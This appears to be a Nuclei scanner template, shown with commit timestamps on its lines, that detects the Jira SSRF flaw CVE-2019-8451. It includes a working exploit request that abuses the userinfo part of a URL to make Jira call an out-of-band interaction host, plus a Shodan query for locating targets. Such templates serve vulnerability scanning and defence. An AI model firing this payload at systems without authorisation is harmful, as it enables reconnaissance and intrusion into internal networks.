2021-01-02 04:59:06 +00:00
id : CVE-2019-8451
2020-07-06 14:52:34 +00:00
info :
name : JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
2021-02-05 19:44:41 +00:00
author : TechbrunchFR
2020-07-06 14:52:34 +00:00
severity : medium
2022-04-22 10:38:41 +00:00
description : The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability
due to a logic bug in the JiraWhitelist class.
2021-08-18 11:37:49 +00:00
reference :
2021-03-30 12:10:17 +00:00
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793
2021-07-30 11:50:31 +00:00
- https://hackerone.com/reports/713900
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-8451
cwe-id : CWE-918
2022-07-04 13:18:28 +00:00
metadata :
shodan-query : http.component:"Atlassian Jira"
2022-08-27 04:41:18 +00:00
tags : atlassian,jira,ssrf,oast,tenable,hackerone,cve,cve2019
2020-07-06 14:52:34 +00:00
requests :
2021-07-30 11:50:31 +00:00
- method : POST
2020-07-06 14:52:34 +00:00
path :
2021-07-30 11:50:31 +00:00
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
2021-07-30 12:05:48 +00:00
2021-08-01 19:57:40 +00:00
body : |
2022-01-07 07:28:37 +00:00
url=https://{{Host}}:443@{{interactsh-url}}
2021-08-01 19:57:40 +00:00
2020-07-06 14:52:34 +00:00
headers :
2021-08-19 13:59:55 +00:00
X-Atlassian-Token : no -check
2021-07-30 11:50:31 +00:00
Content-Type : application/x-www-form-urlencoded
2020-07-06 14:52:34 +00:00
matchers :
- type : word
2021-07-30 11:50:31 +00:00
part : interactsh_protocol
2020-07-06 14:52:34 +00:00
words :
2021-08-01 20:00:00 +00:00
- "http" # Confirms the HTTP Interaction